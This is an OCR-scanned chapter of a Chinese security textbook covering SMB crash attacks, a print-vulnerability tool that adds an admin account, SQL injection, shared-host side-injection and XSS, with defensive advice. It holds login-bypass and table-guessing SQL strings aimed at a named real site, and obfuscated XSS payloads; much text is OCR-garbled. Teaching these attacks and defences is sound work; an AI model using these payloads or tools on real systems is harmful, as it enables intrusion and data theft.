用 于 不 同 计算 机 之 间 文 件 、 打 印 机 、 串 口 和 通信 的 共享 以 及 在 Windows 平台 上 提供 磁盘 和 
打印 机 的 共享 。 

SMB 协议 版 本 有 很 多 种 ,一 般 Windows 2000、Windows 2003 和 Windows XP 使 用 的 
是 NTLM 0. 12 版 本 。 

利用 该 协议 可 以 进行 各 方面 的 攻击 ,例如 可 以 抓 取 其 他 用 户 访问 自己 计算 机 共享 目录 
的 SMB 会 话 包 ,然后 利用 SMB 会 话 包 登 录 对 方 的 计算 机 。 利 用 SMB 协议 让 对 方 操作 系 
统 系统 重新 启动 或 者 蓝屏 。 

使 用 的 工具 软件 是 : SMBdie V1.0, 该 软件 对 打 了 SP3、SP4 的 计算 机 依然 有 效 ,必须 打 
专门 的 SMB 补丁 ,软件 的 主 界面 如 图 6-32 所 示 。 具 体 使 用 步骤 请 参考 第 9 章 实 验 二 十 七 。 
SMBdie v0.1 xi 

Whatis SMBde ? NP address) 
API oo E 
tendng a specialy cialted SMB request. NETBIOS name 
| 


Ashot intialzed. 


6-32 SMB 界面 


攻击 的 时 候 , 需 要 两 个 参数 : 对 方 的 IP 地 址 和 对 方 的 主机 名 ,窗口 中 分 别 输入 这 两 项 ， 
主机 名 通过 FindPass 获得 ,然后 再 单 击 按钮 Kil, 如 果 参 数 输入 没有 错误 的 话 ,对 方 计算 机 
将 立刻 重启 或 蓝屏 ,命中 率 几 乎 100 26 ,被 攻击 的 计算 机 蓝屏 界面 如 图 6-33 所 示 。 


6.9.2 利用 打印 漏洞 攻击 


利用 打印 漏洞 可 以 在 目标 的 计算 机 上 添加 一 个 具有 管理 员 权 限 的 用 户 。 经 过 测试 ,该 
漏洞 在 SP2、SP3 以 及 SP4 版 本 上 依然 存在 ,但 是 不 能 保证 100% 入 侵 成 功 。 

使 用 工具 软件 : cniis. exe, 使 用 的 语法 格式 是 : cniis 192. 168. 1. 5 0 ,第 一 个 参数 是 目标 
的 IP 地 址 ,第 二 参数 是 目标 操作 系统 的 补丁 号 ,因为 192. 168. 1. 5 没有 打 补 丁 ,这 里 就 是 
0。 复 制 cniis. exe 文件 到 C 盘 根 目 录 , 执 行程 序 如 图 6-34 所 示 , 就 可 以 建立 用 户 。 具 体 使 
用 步骤 请 参考 第 9 章 实验 二 十 八 。 
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DASLEUEN hax /user:hax 


图 6-34 利用 打印 漏洞 


6.10. SQL 注入 攻击 


所 谓 SQL 注入 ,就 是 通过 把 SQL 命令 插入 到 Web 表单 递交 或 输入 域名 或 页 面 请 求 的 
查询 字符 串 , 最 终 达到 欺骗 服务 器 执行 恶意 的 SQL 命令 的 目的 ,比如 先前 的 很 ee 
泄露 VIP 会 员 密 码 大 多 就 是 通过 Web 表单 递交 查询 字符 暴 出 的 ,这 类 表单 特别 容易 受到 
SQL 注入 式 攻击 。 


6.10.1 基本 原理 


SQL 注入 攻击 指 的 是 通过 构建 特殊 的 输入 作为 参数 传人 Web 应 用 程序 ,而 这 些 输入 
大 都 是 SQL 语法 里 的 一 些 组 合 ,通过 执行 SQL 语句 进而 执行 攻击 Ag 其 
因 是 程序 没有 细致 地 过 滤 用 户 输 入 的 数据 ,致使 非法 数据 侵入 系统 。 

请 看 下 面 的 代码 。 

某 个 网 站 的 登录 验证 的 SQL 查询 代码 为 : 
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strSQL = "SELECT x FROM users WHERE (name = '" + userName + "') and (pw = '"* passWord *"');" 
恶意 填 人 userName = "1'OR '1'- '1";j passWord = "1' OR '1'='1"; 时 ,将 导致 原本 的 SQL 字符 串 
被 填 为 

strSQL = "SELECT + FROM users WHERE (name = '1'OR'1'='1') and (pu = '1'OR '1'- '1!);" 


也 就 是 实际 上 运行 的 SQL 命令 会 变 成 下 面 这 样 的 ,strSQL = "SELECT * FROM 
users; " 

因此 达到 无 账号 密码 , 亦 可 登录 网 站 的 目的 。 所 以 SQL 注入 攻击 被 俗称 为 黑客 的 填空 
游戏 。 

根据 相关 技术 原理 ,SQL 注入 可 以 分 为 平台 层 注入 和 代码 层 注入 。 前 者 由 不 安全 的 数 
据 库 配置 或 数据 库 平 台 的 漏洞 所 致 ; 后 者 主要 是 由 于 程序 员 对 输入 未 进行 细致 地 过 滤 , 从 
而 执行 了 非法 的 数据 查询 。 基 于 此 ,SQL 注入 的 产生 原因 通常 表现 在 以 下 几 方面 : 不 当 
的 类 型 处 理 ; @ 不 安全 的 数据 库 配 置 ; 加 不 合理 的 查询 集 处 理 ; @ 不 当 的 错误 处 理 ; 回转 
义 字 符 处 理 不 合适 ; @ 多 个 提交 处 理 不 当 。 


6.10.2 常见 注入 方法 


1. 方法 一 

先 猜 表 名 : 

And (Select count( * ) from 表 名 )<>0 

猜 列 名 : 

And (Select count( 列 名 ) from 表 名 )<>0 
或 者 也 可 以 这 样 : 

and exists (select + from 表 名 ) 

and exists (select 列 名 from 表 名 ) 

返回 正确 的 ,那么 写 的 表 名 或 列 名 就 是 正确 的 。 

这 里 要 注意 的 是 ,exists 不 能 应 用 于 猜 内 容 上 ,例如 and exists (select len (user) from 
admin) 773 这 样 是 不 行 的 。 

很 多 人 都 喜欢 查询 数据 库 里 面 的 内 容 , 一 旦 TIS 没有 关闭 错误 提示 ,那么 就 可 以 利用 报 
错 方法 轻松 获得 数据 库 里 面 的 内 容 从 而 获得 数据 库 连接 的 用 户 名 : 


;and user> 0. 
请 参见 网 络 上 的 《SQL 注入 天 书 》, 其 中 谈 到 ,如 果 输 入 这 样 的 地 址 : 
http://jsjy. hebtu. edu. cn/shownews save. asp? id = 2858; and user >0 


在 IIS 服务 器 提示 没 关 闭 , 并 且 SQL Server 返回 错误 提示 的 情况 下 ,可 以 直接 从 出 错 
信息 获取 到 系统 变量 的 信息 。 

“这 名 语句 很 简单 ,但 却 包 含 了 SQL Server 特有 注入 方法 的 精髓 ,我 自己 也 是 在 一 次 无 
意 的 测试 中 发 现 这 种 效率 极 高 的 猜 解 方法 。 让 我 们 来 看 看 它 的 含义 : 首先 ,前 面 的 语句 是 
正常 的 ,重点 在 and user>0, 我 们 知道 ,user 是 SQLServer 的 一 个 内 置 变量 , 它 的 值 是 当前 
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连接 的 用 户 名 ,类 型 为 nvarchar。 拿 一 个 nvarchar 的 值 跟 int 的 数 0 比较 ,系统 会 先 试图 将 
nvarchar 的 值 转 成 int 型 , 当然, 转 的 过 程 中 肯定 会 出 错 ,SQLServer 的 出 错 提示 是 : 将 
nvarchar 值 *“abc” 转 换 数 据 类 型 为 int 的 列 时 发 生 语法 错误 ,abc 正 是 变量 user 的 值 ,这 样 ， 
不 费 吹 灰 之 力 就 拿 到 了 数据 库 的 用 户 名 。 在 以 后 的 篇 幅 里 ,大 家 会 看 到 很 多 用 这 种 方法 的 
语句 。”( 摘 自 (SQL 注入 天 书 》) 

不 过 上 述 的 网 址 已 经 防止 了 SQL 注入 ,输入 上 述 的 地 址 回 车 后 ,会 看 到 图 6-35 的 提示 。 


2m z 
Q 55 o 

非法 操作 | 系统 做 了 如 下 记录 + 

操作 ! P 110.241 68. 

操作 时 间 ，2014 5:44 

操作 页 面 ，/ sbownews_save. asp 


122534. GET 
提交 参数 ，id 
提交 数据 ，2858:and user>0 


| 
| 
j, (mue nenas nmm 


Cm] 


6-35 防止 SQL 注入 的 网 站 


2. 方法 二 

后 台 身 份 验 证 绕 过 漏洞 。 

验证 绕 过 漏洞 就 是 利用 AND 和 OR 的 运算 规则 ,从 而 造成 后 台 脚 本 逻辑 性 错误 。 

例如 管理 员 的 账号 和 密码 分 别 是 admin 和 admin!@ #123, 如 果 后 台 的 数据 库 查 询 语 句 是 
user = request("user") 


passwd = request(" passwd" ) 
Sql- 'select admin from adminbate where user = '&'''&user&'''&' and passwd- '&'''&passwd&' '" 


那么 我 使 用 or a 一 a 来 做 用 户 名 密码 的 话 ,查询 就 变 成 了 ， 

select admin from adminbate where user = ''or 'a' = 'a'and passwd- ''or 'a'- 'a' 
这 样 的 话 , 根 据 运 算 规 则 ,这 里 一 共有 4 个 查询 语句 ,那么 查询 结果 就 是 假 or XC and 假 or 
真 , 先 算 and 再 算 or, 最 终结 果 为 真 ,这 样 就 可 以 进 到 后 台 了 。 

这 种 漏洞 存在 必须 要 有 两 个 条 件 ,第 一 个 是 在 后 台 验 证 代码 上 ,账号 密码 的 查询 要 是 同 
一 条 查询 语句 ,也 就 是 类 似 

sql = "select * from admin where username = '"&username&'&" passwd = '"&passwd&" 


如 果 一 旦 账号 密码 是 分 开 查 询 的 , 先 查 账号 ,再 查 密码 ,这 样 的 话 就 没有 办 法 了 。 
第 二 就 是 要 看 密码 加 不 加 密 , 一 旦 被 MD5 加 密 或 者 其 他 加 密 方式 加 密 的 , 那 就 要 看 第 
一 种 条 件 有 没有 达到 ,没有 达到 第 一 种 条 件 的 话 , 那 就 不 能 实现 绕 过 漏洞 了 。 
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6.10.3 SQL 注入 防范 


THET SQL 注入 的 方法 ,如 何 防止 SQL 注入 ? 如 何 进 一 步 防范 SQL 注入 的 泛滥 ? 我 
们 通过 一 些 合 理 的 操作 和 配置 来 降低 SQL 注入 的 危险 。 

1. 使 用 参数 化 的 过 滤 性 语句 

永远 不 要 使 用 动态 拼装 SQL, 可 以 使 用 参数 化 的 SQL 或 者 直接 使 用 存储 过 程 进 行 数 
据 查 询 存 取 。 

要 防御 SQL 注入 ,用户 的 输入 就 绝对 不 能 直接 被 嵌入 到 SQL 语句 中 。 人 恰恰 相反 ,用 户 
的 输入 必须 进行 过 滤 ,或 者 使 用 参数 化 的 语句 。 参 数 化 的 语句 使 用 参数 而 不 是 将 用 户 输入 
嵌入 到 语句 中 。 在 多 数 情况 中 ,SQL 语句 就 得 以 修正 。 然 后 ,用 户 输入 就 被 限于 一 个 参数 。 

2. 输入 验证 

永远 不 要 信任 用 户 的 输入 。 对 用 户 的 输入 进行 校 验 , 可 以 通过 正则 表达 式 , 或 限制 长 
度 , 对 单 引号 和 双 ”- "进行 转换 等 。 

检查 用 户 输入 的 合法 性 ,确信 输入 的 内 容 只 包含 合法 的 数据 。 数据 检查 应 当 在 客户 端 和 
服务 器 端 都 执行 。 之 所 以 要 执行 服务 器 端 验证 ,是 为 了 弥补 客户 端 验证 机 制 脆弱 的 安全 性 。 

在 客户 端 , 攻 击 者 完全 有 可 能 获得 网 页 的 源 代 码 , 修 改 验证 合法 性 的 脚本 (或 者 直接 删 
除 脚 本 ) ,然后 将 非法 内 容 通过 修改 后 的 表单 提交 给 服务 器 。 因 此 ,要 保证 验证 操作 确实 已 
经 执行 ,唯一 的 办 法 就 是 在 服务 器 端 也 执行 验证 。 你 可 以 使 用 许多 内 建 的 验证 对 象 ,例如 
Regular Expression Validator, 它 们 能 够 自动 生成 验证 用 的 客户 端 脚本 ,当然 你 也 可 以 插入 
服务 器 端的 方法 调用 。 如 果 找 不 到 现成 的 验证 对 象 ,你 可 以 通过 Custom Validator 自己 创 
建 一 个 。 

3. 错误 消息 处 理 

防范 SQL 注入 ,还 要 避免 出 现 一 些 详细 的 错误 消息 ,应 用 的 异常 信息 应 该 给 出 尽 可 能 
少 的 提示 ,最 好 使 用 自 定义 的 错误 信息 对 原始 错误 信息 进行 包装 ,因为 黑客 们 可 以 利用 这 些 消 
息 。 要 使 用 一 种 标准 的 输入 确认 机 制 来 验证 所 有 的 输入 数据 的 长 度 、 类 型 .语句 ,企业 规则 等 。 

4. 加 密 处 理 

不 要 把 机 密 信 息 直 接 存放 ,加 密 或 者 hash 掉 密码 和 敏感 的 信息 。 

将 用 户 登 录 名 称 、 密 码 等 数据 加 密 保存 。 加 密 用 户 输 入 的 数据 ,然后 再 将 它 与 数据 库 中 
保存 的 数据 比较 ,这 相当 于 对 用 户 输 入 的 数据 进行 了 “消毒 "处理 ,用 户 输入 的 数据 不 再 对 数 
据 库 有 任何 特殊 的 意义 ,从 而 也 就 防止 了 攻击 者 注入 SQL 命令 。 

5. 利用 存储 过 程 来 执行 所 有 的 查询 

SQL 参数 的 传递 方式 将 防止 攻击 者 利用 单 引 号 和 连 字符 实施 攻击 。 此 外 , 它 还 使 得 数 
据 库 权限 可 以 限制 到 只 允许 特定 的 存储 过 程 执 行 ,所 有 的 用 户 输入 必须 遵从 被 调用 的 存储 
过 程 的 安全 上 下 文 ,这样 就 很 难 青 发 生 注 入 式 攻击 了 。 

6. 使 用 专业 的 漏洞 扫描 工具 

攻击 者 们 目前 正在 自动 搜索 攻击 目标 并 实施 攻击 ,其 技术 其 至 可 以 轻易 地 被 应 用 于 其 
他 的 Web 架构 的 漏洞 中 。 企 业 应 当 投 资 于 一 些 专 业 的 漏洞 扫描 工具 ,SQL 注入 的 检测 方 
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法 一 般 采 取 辅 助 软件 或 网 站 平台 来 检测 ,软件 一 般 采 用 SQL 注入 检测 工具 jsky, 网 站 平台 
就 有 亿 思 网 站 安全 平台 检测 工具 ,MDCSOFT SCAN 等 。 采 用 MDCSOFT-IPS 可 以 有 效 地 
防御 SQL 注入 ,XSS 攻击 等 。 一 个 完善 的 漏洞 扫描 程序 不 同 于 网 络 扫描 程序 , 它 专门 查找 
网 站 上 的 SQL 注入 式 漏洞 。 最 新 的 漏洞 扫描 程序 可 以 查找 最 新 发 现 的 漏洞 。 

7. 确保 数据 库 安全 

永远 不 要 使 用 管理 员 权 限 的 数据 库 连 接 , 为 每 个 应 用 使 用 单独 的 有 限 权限 的 数据 库 连 接 。 

锁定 你 的 数据 库 的 安全 ,只 给 访问 数据 库 的 Web 应 用 功能 所 需 的 最 低 的 权限 ,撤销 不 

要 的 公共 许可 ,使 用 强大 的 加 密 技术 来 保护 敏感 数据 并 维护 审查 跟踪 。 如 果 Web 应 用 

不 需要 访问 某 些 表 ,那么 确认 它 没 有 访问 这 些 表 的 权限 。 如 果 Web 应 用 只 需要 只 读 的 权 
限 ,那么 就 禁止 它 对 此 表 的 drop, insert, update, delete 的 权限 ,并 确保 数据 库 打 了 最 新 
补丁 。 

8. 安全 审 评 

在 部 署 应 用 系统 前 ,始终 要 做 安全 审 评 。 建 立 一 个 正式 的 安全 过 程 , 并 且 每 次 做 更 新 
时 ,要 对 所 有 的 编码 做 审 评 。 开 发 队伍 在 正式 上 线 前 会 做 很 详细 的 安全 审 评 , 然 后 在 几 周 或 
几 个 月 之 后 他 们 做 一 些 很 小 的 更 新 时 ,他 们 会 跳 过 安全 审 评 这 关 ,“ 就 是 一 个 小 小 的 更 新 ,我 
们 以 后 再 做 编码 审 评 好 了 ”。 请 始终 坚持 做 安全 审 评 。 


6. 10.4 案例 和 工具 


(1) 打开 Safe3 Web 漏洞 扫描 系统 ,在 地 址 栏 中 ,输入 要 检测 的 网 址 , 勾 选 相应 的 选项 
后 ,选择 后 面 的 “扫描 ”, 就 可 以 扫描 出 某 个 网 站 的 可 能 漏洞 ,如 图 6-36 所 示 。 


全 Safes Web 和 二 系统 企业 活 v101 Crack By Lkou(LCG]- Http//www S2poje cn 
Pss Pus Que 


Qu jsjy-hebtu. edu. en 
nm mmm MTT? 验证 授权 
M Javascripti VI W1 重 定向 V rostit Wisata — VD XSSMBA |] Fone ese: | 
M EREA Versa Cni 
^ ERN ES iius | 
æ mas F] Digest i 
[3 logout Zr D Domain: 
RIRE 
la moi ÆA: 12 


DX nozdor tjr] 


图 6-36 Safe3 Web 漏洞 扫描 系统 
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(2) 另外 提供 一 个 啊 D 注入 工具 ,此 工具 可 以 进行 注入 检测 ,也 可 以 进行 上 传 操 作 , 如 
图 6-37 所 示 。 


a /? 开始 位 置 | xb 


: @ USSO. fre Pr 


6-37 WDitArR 


6.11 3j iE X di 


旁 注 是 最 近 网 络 上 比较 流行 的 一 种 入 侵 方法 ,在 字面 上 解释 就 是 "从 旁 注入 ”, 利 用 同一 
主机 上 面 不 同 网 站 的 漏洞 得 到 WebShell, 从 而 利用 主机 上 的 程序 或 者 是 服务 所 暴露 的 用 户 
所 在 的 物理 路 径 进 行人 侵 。 


6.11.1. 旁 注 攻击 的 原理 


这 种 攻击 主要 针对 中 小 企业 网 站 。 旁 注 又 分 为 域名 旁 注 和 IP 旁 注 。 域 名 旁 注 攻 击 通 
过 一 个 域名 绑 定 的 IP 查询 这 个 IP 上 面 解析 了 多 少 个 域名 ,由 此 查 出 同一 个 服务 器 所 挂 的 
全 部 网 站 ,黑客 只 要 渗透 同一 服务 器 中 安全 性 能 最 差 的 网 站 ,再 通过 提 权 或 配置 不 当 等 方式 
入 侵 目标 网 站 。 

中 小 企业 网 站 限于 资金 和 人 员 的 缺乏 ,大 多 将 自己 的 网 站 进行 了 托管 ,每 年 只 需 交 纳 几 
百 元 空间 费 便 可 放 在 一 个 虚拟 主机 上 面 ,而 一 个 虚拟 主机 通常 有 多 个 企业 网 站 。 黑 客 若 要 
对 某 个 企业 网 站 进行 攻击 ,只 需 通 过 目标 网 站 服务 器 上 的 其 他 网 站 拿 下 服务 器 的 权限 ,或 者 
在 其 他 网 站 目录 里 上 传 一 个 脚本 木马 便 可 对 目标 网 站 进行 操作 。 旁 注 的 工具 在 网 上 非常 容 
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易 得 到 ,例如 比较 著名 的 domain( 明 小 子 ) 旁 注 工 具 , 只 需要 将 可 能 是 放置 在 虚拟 主机 上 的 
网 站 的 网 址 输入 进去 ,工具 将 自动 分 析 , 找 到 虚拟 主机 上 的 其 他 存在 漏洞 的 网 站 ,然后 得 到 
主机 的 控制 权 , 对 该 虚拟 主机 下 的 网 站 一 并 进行 攻击 。 图 6-38 是 一 个 帮助 用 户 通 过 IP 反 查 
域名 的 网 站 (http://dns. aizhan. com) ,通过 它 ,我 们 也 可 以 查询 到 在 某 个 IP 上 绑 定 的 域名 。 


Hid: httg://dns. ui chan. con ~- a aR et RA x 


des sihan com 15:61 166.178.187 gu 


meae MRPINGMUN C IP&EEUSE (D whois S whoisster 


[ PRERE ma cmm: | Ed 


*IBUUESEXMPENETWSNS, 


SIQSIPIIILET) 120.0.117.133 所 在 地 区 为 : HIC Gen dS 
aE na a PR 


Sma: nachalovoorg blumyankeaskbaljingJicogold.com wan020com  backgroundcheckslSallallacom maileastern-bridge.com 


6-38 IP 反 查 域名 网 站 (http://dns. aizhan. com) 


6.11.2. 应 对 策略 


防止 旁 注 攻击 的 应 对 策略 有 以 下 两 种 方法 。 
1. 选择 信誉 度 好 的 主机 提供 商 


若 企业 自身 没有 能 力 购买 服务 器 ,一 定 要 选择 信誉 度 好 、 保 护 措施 完善 的 虚拟 主机 空间 
提供 商 放置 网 站 内 容 。 黑 客 之 所 以 能 * 旁 注 ”, 是 因为 IIS 对 于 远程 的 普通 用 户 访问 设置 了 
一 个 专用 的 “IUSR 机 器 名 ”的 账号 ,IIS HI" TUSR 机 器 名 ”的 账号 来 管理 所 有 网 站 的 访问 权 
限 , 若 给 每 个 网 站 分 别 设置 一 个 单独 的 IIS 控制 账号 ,IIS 控制 账号 的 权限 设 为 Guests 组 ， 
这 样 即使 黑客 通过 服务 器 的 一 个 网 站 拿 到 权限 ,也 只 是 这 个 网 站 的 权限 ,服务 器 其 他 网 站 没 
有 权限 可 以 访问 。 

2. 采用 域名 绑 定 方法 


通过 使 用 域名 绑 定 方法 , 先 将 域名 的 A 记录 绑 到 一 个 无 用 的 IP. 上 ,再 在 下 面 把 同一 个 
域名 绑 到 正确 的 IP 上 ,这样 黑客 使 用 WHOS 查询 就 会 去 查询 那个 无 用 IP 上 的 信息 ,得 不 
到 所 期 望 的 结果 o 


6.11.3 案例 和 工具 


请 访问 一 下 秦 凡 超 的 博客 ,地 址 http://www. qinfanchao. com。 利 用 旁 注 查询 工具 ,查看 
一 下 在 这 个 IP 地 址 上 有 多 少 网 站 。 网 站 截屏 如 图 6-39 所 示 ,检测 后 的 截屏 如 图 6-40 所 示 。 
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里 插 


回 qinfanchac.com 


素 凡 超 博客 


nmm 


这 几 天 在 青 秀山 … 


2014 年 月 19 日 


XSS | Cs 


恶意 


:Nisers Ni?ping www.latersoft.com 


113.180.281. 
113.189.201. 
113.189.201. 
MERTER 


-18.281.11 的 回 
-18.281.11 的 回复 


Ping www.latersoft.com [113.18.201.11] 具有 32 字 节 的 数据 : 


53ms TIL-114 
55ns TTL-114 
53ms TIL-114 


TIL-114 
TIL-114 
TIL«114 
TIL«114 


— IP 有 不 同 的 域名 


6.12 XSS 攻击 


HTML 代码 , 当 用 户 浏览 该 


5 (Cross Site Script) , 跨 站 脚本 攻击 。 
页 之 时 ， 


嵌入 其 中 Web 


它 指 的 是 恶 


意 攻击 者 往 Web 页 


E 


里 面 的 HTML 代码 会 被 
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行 ,从 而 达到 恶意 攻击 者 的 特殊 目的 。 
常见 的 脚本 类 型 包括 HTML, JavaScript, VBScript, ActiveX, Flash 等 。XSS 可 以 出 现 
在 任何 浏览 器 中 。 


6.12.1 XSS 跨 站 脚本 
设计 一 个 登录 界面 ,其 中 有 一 部 分 是 用 户 遗 忘 密码 后 取 回 密码 的 语句 ,部 分 代码 如 下 。 


< A HREF = "forgot. asp?user = "> Forgot your Password?</A> 


当 用 户 在 用 户 名 处 输入 Javascript 语言 ,并 提交 时 会 出 现 错误 提示 。 
请 看 提交 时 ,书写 代码 的 不 同 ,出 现 的 现象 如 图 6-41 所 示 。 


6.12.2 XSS 跨 站 攻击 的 流程 
XSS 跨 站 攻击 的 流程 如 图 6-42 所 示 。 


p 1. 攻击 者 对 页 面 进行 XSS 攻 击 
<A i 
HREF= Meer ?user= 


> Forgot your password? </A> 


3. 恶意 代码 被 执行 


4. 受害 者 浏览 攻击 者 恶意 页 面 
息 
息 


HREF="forgot.asp?user= x: 
"> Forgot your password? </A; b 5. 攻击 者 发 出 亚 


6. 受害 者 发 送 敏感 信 


图 6-41 写 入 不 同 代码 举例 图 6-42 XSS 攻击 流程 


6.12.3 XSS 跨 站 攻击 原理 

我 们 浏览 的 网 页 全 部 是 采用 超 文 本 标记 语言 创建 的 ,例如 下 面 的 代码 : 

<A HREF = "http://www. hebtu. edu. cn"> 河 北 师范 大 学 </A> 

我 们 看 到 的 就 是 一 个 超 链接 。 

而 XSS 攻击 的 基本 原理 就 是 往 HTML 中 注入 脚本 ,在 HTML 中 可 以 指定 脚本 标记 
二 script 记 之 /script 记 ,在 没有 过 滤 字 符 的 情况 下 ,只 需要 保持 完整 无 错 的 脚本 标记 即 可 触 
发 XSS, 例 如 我 们 在 上 面 网 页 中 的 例子 , 当 某 个 资料 表单 提交 内 容 , 表 单 提交 内 容 就 是 某 个 
标记 属性 所 赋 的 值 ,我 们 可 以 构造 如 下 值 来 闭合 标记 从 而 构造 出 完整 无 错 的 脚本 标记 。 


">< script > alert('XSS');</script ><" 


这 种 注入 方式 很 像 SQL 注入 。 
6.12.4 XSS 的 脚本 攻击 的 触发 条 件 
有 4 种 方式 可 以 触发 XSS 脚本 。 
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1. 完整 无 错 的 脚本 标记 

这 种 条 件 就 是 我 们 在 前 面 书写 过 的 ,采用 特定 的 字符 串 ,构造 出 闭合 且 无 错 的 脚本 标 
记 , 此 种 方法 不 再 袭 述 。 

2. 访问 文件 的 标记 属性 

当 不 能 采用 脚本 标记 时 ,该 怎么 办 呢 ? 我 们 这 里 采用 访问 其 他 文件 标记 的 属性 。 例 如 ， 
常见 的 一 个 超 链 接 ,一 img src=" http://www. hebtu. edu. cn /net. gif" img 标记 并 不 是 
真正 地 把 图 片 加 入 到 HTML 文档 中 把 两 者 合 二 为 一 ,而 是 通过 src 属性 赋值 ,告诉 浏览 器 
这 里 要 显示 一 个 图 片 ,图 片 的 位 置 在 src 所 指明 的 地 方 。 那 么 浏览 器 的 任务 就 是 解释 这 个 
img 标记 ,访问 src 属性 所 赋值 中 的 URL 地 址 并 显示 图 片 。 问 题 Tm 04 
来 了 ,浏览 器 会 不 会 检测 src 属性 所 赋 的 值 呢 ? 答案 是 否 ! 那么 IN E 
我 们 就 可 以 在 这 里 大 做 文章 了 ,接触 过 Javascript 的 同学 应 该 知 
道 ,Javascript 有 一 个 URL 伪 协 议 ,可 以 使 用 “javascript: ”这 种 m) 
协议 说 明 附 加 上 任意 的 Javascript 代码 , 当 浏 览 器 装载 这 样 的 
URL 时 , 便 会 执行 其 中 的 代码 ,于 是 我 们 就 得 出 了 一 个 经 典 的 。 EE XSS 示 例 
XSS 示例 ,如 图 6-43 所 示 。 


< ing src = "javascript:alert('XSS');"» 


3. 触发 事件 

不 是 所 有 的 标记 属性 都 能 够 触发 XSS。 如 果 标 记 属性 不 能 使 用 ,我 们 还 可 以 采用 事件 
方式 ,img 标记 有 一 个 onerror() 事 件 , 当 img 标记 内 含有 一 个 onerror() 事 件 而 正好 图 片 没 
有 正常 显示 时 ,这 个 事件 便 会 被 触发 ,而 这 个 事件 中 可 以 加 入 任意 的 脚本 并 能 被 执行 ,这 样 
我 们 得 到 了 另外 一 个 经 典 的 KSS 攻击 的 例子 : 

< ing src =" http://xss. jpg" onerror- alert('XSS')» 

产生 的 结果 如 图 6-43 所 示 。 

4. 请 求 失败 

许多 cgi/php 脚本 执行 时 ,如 果 它 发 现 客户 提交 的 请 求 页 面 并 不 存在 或 发 生 其 他 类 型 
的 错误 时 ,出 错 信息 会 被 打印 到 一 个 HTML 文件 ,并 将 该 错误 页 面 发 送 给 访问 者 。 

例如 : 404-yourfile. html Not Found! 

我 们 利用 URL 做 下 面 的 请 求 ; 

http://jsjy. hebtu. edu. cn/view. asp?id=< script>alert('XSS')</script> 

如 果 没 有 被 屏蔽 ,会 在 页 面 上 弹出 一 个 消息 框 ,当然 这 个 例子 只 有 演示 意义 ,而 无 实际 作用 。 
6.12.5 针对 XSS 入 侵 的 防御 


通常 的 网 站 都 会 过 滤 掉 类 似 Javascript 的 关键 字符 ,让 攻击 者 不 能 够 构造 出 XSS 代码 ， 
但 是 有 两 个 字符 容易 被 忽略 掉 , 这 就 是 *&” 和 *\”。 

首先 来 说 说 "&" 字 符 , 玩 过 SQL 注入 的 都 知道 ,注入 的 语句 可 以 转 成 十 六 进 制 再 赋 给 
一 个 变量 运行 ,XSS 的 转 码 和 这 个 还 真有 异曲同工 之 妙 , 原 因 是 我 们 的 TE. 浏览 器 默认 采用 
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的 是 Unicode 编码 ,HTML 编码 可 以 用 8-& ASCI 方式 来 写 ,这 种 XSS 转 码 支持 十 进 制 和 
十 六 进 制 ,SQL 注入 转 码 是 将 十 六 进 制 字符 串 赋 给 一 个 变量 ,而 XSS 转 码 则 是 针对 属性 所 
WAJE., FERRE <img src— "javascript: alert CXSS) ; " 7 f9]. F ri d 3i dil c JR : 


«img src- "&i106&i 97&i:118&:97& #1158 i£ 99& & 114& 4 105& 3t 112& & 116& # 58& 4 97& 3$ 108& # 
101&i114&i 116&# 40&it 39& t 88& #838 # 83& 8 39& £ 41& € 59"»- 


如 图 6-44 所 示 。 


D ihm- 记事 本 

IRO WM HRY 

King 

Src-"&106t897581186897641156890621 1641055107 17 541168458648 
,839188848368836829 68A 168597» LL ly "T 


6-44 转 码 后 的 XSS 代码 


后 面 是 十 六 进 制 转 码 后 的 代码 ， 


< ing src = "&it x6a&it x61& it x76& # x61& # x73& # x63& # x72& # x69& # x70& # x74& # x3a& # x61& # 

X6c& H x65&3t x728 # x 748 # x28&  x27& 5 x58& 4 x53& 4 x53& 4 x278 x298 # x3b"» 

这 个 & # 分 隔 符 还 可 以 继续 加 0 变 成 “& g 0106", * 8 2: 00106", * 8. # 000106”, 
*&. 4 0000106" JE 5X , 

而 这 个 "\" 字 符 却 暴露 了 一 个 严重 的 XSS Oday 漏洞 ,这 个 漏洞 和 CSS(Cascading Style 
Sheets) 层 释 样 式 表 有 很 大 的 关联 ,下 面 我 就 来 看 看 这 个 漏洞 , 先 举 个 Javascript 的 eval R 
数 的 例子 ,官方 是 这 样 定 义 这 个 函数 的 ， 

evalCcodeString) , 必 选 项 codeString 参数 是 包含 有 效 Javascript 代码 的 字符 串 值 。 这 
个 字符 串 将 由 Javascript 分 析 器 进行 分 析 和 执行 。 

我 们 的 Javascript 中 的 "\" 字 符 是 转 义 字符 ,所 以 可 以 使 用 人 \" 连 接 16 进 制 字符 串 运 行 代码 。 

< SCRIPT LANGUAGE = "JavaScript"> 

eval("\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\x61\x6c\x65\x72\x74\x28\x22\x58\x53\ 


x53\x22\x29") 
</SCRIPT > 


铠 怖 的 是 ,样式 表 也 支持 分 析 和 解释 "\" 连 接 的 16 进 制 字符 串 形式 ,浏览 器 能 正常 解 
下 面 我 们 来 做 个 实验 。 
写 一 个 指定 某 图 片 为 网 页 背景 的 CSS 标记 : 


<html> 

<body> 

<style> 

BODY { background: url(http://127.0.0.1/xss.gif) } 
</style> 

<body> 

<html> 


A 
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保存 为 HTM ,浏览 器 打开 显示 正常 。 
转换 background 属性 值 为 "\" 连 接 的 十 六 进 制 字符 串 形式 ,浏览 器 打开 同样 显示 正常 。 
<html> 
<body> 
<style> 
BODY { background: \75\72\6c\28\68\74\74\70\3a\2f\2f\31\32\37\2e\30\2e\30\2e\31\2f\78\73\ 
73\2e\67\69\66\29 } 
</style> 
<body> 
<html> 


在 文章 第 一 部 分 已 经 说 过 XSS 的 触发 条 件 包括 访问 文件 的 标记 属性 ,因此 我 们 不 难 构造 出 
< ing STYLE = "background - image: url(javascript:alert('XSS'))"> 


这 样 的 XSS 语句 。 有 了 实验 的 结果 ,我 们 又 能 对 CSS 样式 表 的 标记 进行 XSS 转 码 ou 
览 器 将 帮 有 我 们 解释 标记 内 容 。XSS 语句 示例 : 


< img STYLE = "background - image: \75\72\6c\28\6a\61\76\61\73\63\72\69\70\74\3a\61\6c\65\ 
72\74\28\27\58\53\53\27\29\29"> 


结果 如 图 6-45 所 示 。 


IT xl 


— a 
XD MRO GLO FEV MHI 
ing STVLE-"background-image: \75\72\6c\28\ np 
ENN O 


6-45 ”利用 CSS 属性 攻击 的 XSS 


